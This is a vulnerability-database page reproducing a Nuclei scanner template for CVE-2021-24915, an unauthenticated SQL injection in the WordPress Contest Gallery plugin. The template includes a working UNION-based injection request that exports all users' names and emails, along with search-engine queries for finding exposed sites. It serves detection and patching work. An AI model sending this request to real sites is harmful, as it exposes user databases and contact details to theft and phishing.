Lucene search
K

Contest Gallery < 13.1.0.6 - SQL injection

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 41 Views

Contest Gallery < 13.1.0.6 - SQL injection,allows unauthenticated SQL injections attacks,export all users' detail

Related
Refs
Code
id: CVE-2021-24915

info:
  name: Contest Gallery < 13.1.0.6 - SQL injection
  author: r3Y3r53
  severity: critical
  description: |
    The plugin does not have capability checks and does not sanitise or escape the cg-search-user-name-original parameter before using it in a SQL statement when exporting users from a gallery, which could allow unauthenticated to perform SQL injections attacks, as well as get the list of all users registered on the blog, including their username and email address.
  impact: |
    Unauthenticated attackers can exploit SQL injection to extract database contents and enumerate all registered users including their email addresses, potentially facilitating targeted phishing attacks.
  remediation: Fixed in version 13.1.0.6
  reference:
    - https://wpscan.com/vulnerability/45ee86a7-1497-4c81-98b8-9a8e5b3d4fac
    - https://gist.github.com/tpmiller87/6c05596fe27dd6f69f1aaba4cbb9c917
    - https://wordpress.org/plugins/contest-gallery/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-24915
    cwe-id: CWE-89
    epss-score: 0.127
    epss-percentile: 0.95779
    cpe: cpe:2.3:a:contest_gallery:contest_gallery:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: contest_gallery
    product: contest_gallery
    framework: wordpress
    shodan-query: http.html:/wp-content/plugins/contest-gallery/
    fofa-query: body=/wp-content/plugins/contest-gallery/
    publicwww-query: "/wp-content/plugins/contest-gallery/"
  tags: cve2021,cve,wordpress,wp-plugin,wpscan,wp,contest-gallery,contest_gallery,sqli,vuln,vkev

http:
  - raw:
      - |
        POST /wp-admin/admin.php?page=contest-gallery/index.php&users_management=true&option_id=1 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        cg-search-user-name=&cg-search-user-name-original=%27%20UNION%20ALL%20SELECT%20NULL%2CCONCAT%280x717a6b7871%2CIFNULL%28CAST%28VERSION%28%29%20AS%20NCHAR%29%2C0x20%29%2C0x716b707871%29%2CNULL--%20-&cg_create_user_data_csv_new_export=true&cg-search-gallery-id-original=&cg-search-gallery-id=&cg_create_user_data_csv=true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'WpUserId'
          - 'Username'
          - 'Usermail'
        condition: and

      - type: word
        part: header
        words:
          - 'text/csv'
          - 'filename='
        condition: and

      - type: status
        status:
          - 200
# digest: 490a004630440220043d59167e1aaa5d85c972e1fb8a1dffdbd6c671713815e1afed338989ecb18402204eba4da9855d86399203ee569a34655ffcf74af567381705ba249572c41a9e18:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.3High risk
Vulners AI Score7.3
CVSS 27.5
CVSS 3.19.8
EPSS0.127
41